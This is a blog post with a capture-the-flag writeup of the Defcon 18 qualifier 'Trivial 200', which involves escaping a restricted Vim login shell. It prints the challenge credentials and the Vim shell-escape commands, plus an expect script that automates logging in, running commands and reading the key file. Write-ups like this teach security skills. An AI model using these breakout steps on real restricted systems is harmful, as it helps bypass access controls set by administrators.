Thursday, May 27, 2010

Defcon 18 CTF quals writeup - Trivial 200

Trivial 200 was an evil blind VIM terminal you had to escape from.

Description: sheep@pwn21.ddtek.biz:6000 sheep go baaAaaA

One could simply SSH to the server with:
ssh -p 6000 sheep@pwn21.ddtek.biz # and use password baaAaaA
However, it appeared that the server was overloaded and most of the time SSH did not work. The solution is to connect to SSH continuously until it works with some shell scripting:
while true; do
  ssh -p6000 sheep@pwn21.ddtek.biz
done
Once connected, you get a black screen with nothing but rapidly discover you are in VIM text editor.

About the black screen and nothing displayed, you could either:
  • under Windows with PuTTY uncheck Window/Colours options
  • select text and copy/paste it elsewhere, the content is here
  • write some expect to automate SSH connection and sending of commands and be able to pipe the output of SSH

A few useful VIM commands:
:q! => quit
:o => open a file
:!<command> => run command *in default shell*

We tried to list files with:
:!ls
but it did not work. So we opened /etc/passwd with:
:o /etc/passwd
and discovered that the default shell of sheep user was /usr/bin/vim. Simply change it with:
:set shell /bin/bash

Then we were able to list files:
:!ls
and view the key file:
-rw-r-----. 1 root sheepy 13 May 22 00:01 key
Just open it with:
:o key
and you get the key: SHis4pansies.

At the same time, I was doing some expect & shell to get the key. Expect comes very handy when you want to automate things or when you want to get the output of an interactive program such as ssh. Let me show you this solution as a small introduction to expect.

The expect script:
$ cat ssh-cmd.expect
#!/usr/bin/expect -f
set cmd [lindex $argv 0]
spawn ssh -p 6000 sheep@pwn21.ddtek.biz
expect "*?assword:*"
send -- "baaAaaA\r"
sleep 1
send -- ":set shell=/bin/sh\r"
send -- ":!$cmd\r"
send -- ":q!\r"
expect eof

The shell script that runs expect and filters the output for us:
$ cat ssh-cmd.sh
#!/bin/sh
# remove these annoying [ terminal color codes
./ssh-cmd.expect "$*" | strings | grep -v '^\['

List files:
$ ./ssh-cmd.sh ls -l
spawn ssh -p 6000 sheep@pwn21.ddtek.biz
sheep@pwn21.ddtek.biz's password:
Last login: Sat May 22 05:34:03 2010 from x
total 4
-rw-r-----. 1 root sheepy 13 May 22 00:01 key
Press ENTER or type command to continue
Connection to pwn21.ddtek.biz closed.

Cat the key:
$ ./ssh-cmd.sh cat key
spawn ssh -p 6000 sheep@pwn21.ddtek.biz
sheep@pwn21.ddtek.biz's password:
Last login: Sat May 22 05:34:18 2010 from x
SHis4pansies
Press ENTER or type command to continue
Connection to pwn21.ddtek.biz closed.

Done!

1 comment:

  1. Super intéressant le petit point en plus sur expect, je te remercie!

    ReplyDelete